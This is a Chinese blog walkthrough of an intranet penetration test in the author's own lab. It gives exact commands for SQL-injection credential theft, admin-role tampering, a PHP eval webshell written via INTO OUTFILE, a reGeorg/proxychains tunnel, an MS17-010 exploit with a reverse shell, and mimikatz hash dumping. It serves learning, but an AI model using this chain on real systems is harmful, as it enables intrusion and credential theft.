内网渗透模拟测试过程

最新推荐文章于 2025-06-23 09:51:35 发布

刺心

最新推荐文章于 2025-06-23 09:51:35 发布

阅读量2.6k

点赞数 3

CC 4.0 BY-SA版权

文章标签：内网渗透代理工具端口漏洞

本文链接：https://blog.youkuaiyun.com/win176489/article/details/90715832

作者搭建测试环境进行内网渗透测试，先通过SQL注入获取后台用户密码，添加超级管理员，插入一句话木马并连接。接着使用regeorg隧道代理工具打开隧道，配合proxychains使用代理隧道，扫描内网主机端口，利用漏洞攻击，最终成功登陆目标主机。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

之前好长一段时间，感觉在拿到网站shell和系统shell的时候，面对内网的好多主机，都无从下手。

一方面是自身的逻辑思路不是特别清晰，另外还是自身的技术水平不够，但是随着自己慢慢的学习，摸索，自己搭了一个测试的环境开始测试，过程非常坎坷，但是真正学到了东西。
测试流程：通过拿到模拟的外网主机shell,进而渗透模拟内网主机的shell
测试机器：模拟的外网主机windows2003 (双网卡)ip 192.168.31.196 192.168.238.128
模拟的内网主机windows2003 ip 192.168.238.129
攻击机 kali ip 192.168.31.43 win10(本机) 192.168.31.169
首先用物理机访问192.168.31.196 (我绑定的域名是jy.test.com,所以直接访问域名)

在链接http://jy.test.com/hr/hr.php?hrid=11加’，数据库直接报错了
把这url地址放到sqlmap跑一下，直接得到后台用户和密码

利用御剑跑一下网站的后台，得到后台地址，还有一个phpinfo页面

利用后台URL和用户名密码组合直接登陆

登录后是一个普通管理员的账号，点击修改密码

点击添加管理员，提示没有权限。。。。。
开启burp，设置代理，再次点击添加管理员

把submanage改成manage放包就进入添加管理员功能了，之后在利用burp修改fr_admin_type参数提交，就可以添加超级管理员用户了，我这里添加了一个hack的超级管理员用户
退出这个普通用户登陆刚才创建的hack账号
在后台执行sql语句的功能插入一句话木马
payload为select “<?php eval($_POST[apple]);?>” into outfile “/UPUPW_AP5.2/vhosts/jy.test.com/hack.php”
利用蚁剑连接一句话木马

成功连接
我们看一下ip

输入命令看一下局域网的ip arp-a

238段的主机被探测到了，但是我们物理机又不能直接访问
接下来就使用regeorg隧道代理工具打开隧道
首先在kali机运行regeorg，没安装过regeorg的可以输入 git clone https://github.com/sensepost/reGeorg.git
然后加载python模块 pip install urllib3
就可以使用了
先将regeorg自身的tunnel.php上传到拿到webshell的网站目录下
在regeorg 执行python reGeorgSocksProxy.py -p 6666 -u “http://192.168.31.196/tunnel.php”
出现这个界面就说明隧道已经打开了
接着配合工具proxychains使用代理隧道
首先需要配置proxychains （默认是需要配置才可以使用的）
在kali机执行vim /etc/proxychains.conf

去掉dynamic_chain前面的注释
在底部添加socks5 127.0.0.1 6666 保存退出
测试连接命令 proxyresolv 192.168.31.196

出现OK就说明代理成功
在kali机输入proxychains firefox 在弹出的firefox访问192.168.238.128（目标机的另一块网卡IP）
成功访问到了
接着利用proxychains nmap 扫描内网主机端口
命令如下 proxychains nmap -vvv -n -sT -PN 192.168.238.129
得到内网主机开放的端口为

这里看到开放了445端口所以利用msf里面exploit/windows/smb/ms17_010_psexec模块进行攻击
设置攻击模块 use exploit/windows/smb/ms17_010_psexec
设置攻击ip set RHOST 192.168.238.129
设置攻击payload set payload windows/x64/shell/reverse_tcp
设置本地ip set LHOST 192.168.31.43
run

攻击成功后并建立了会话，查看一下IP ipconfig
查看权限 getuid

权限为系统权限，nmap扫描到目标机的3389端口没有打开
尝试用命令打开3389端口 run post/windows/manage/enable_rdp
加载mimikatz load mimikatz
获取用户密码的hash mimikatz_command -f samdump::hashes

撞库解密得到弱口令密码admin123
利用远程连接桌面命令proxychains rdesktop 192.168.238.129
连接目标主机

成功登陆目标主机，目标完成！！
由于技术很菜，操作过程中遇到了很多大大小小的问题，差点放弃，但是还是迎着头皮做下来了，这个过程确实使我学会了很多东西，终于可以松一口气了。哈哈哈
日积月累，方能成就完美人生。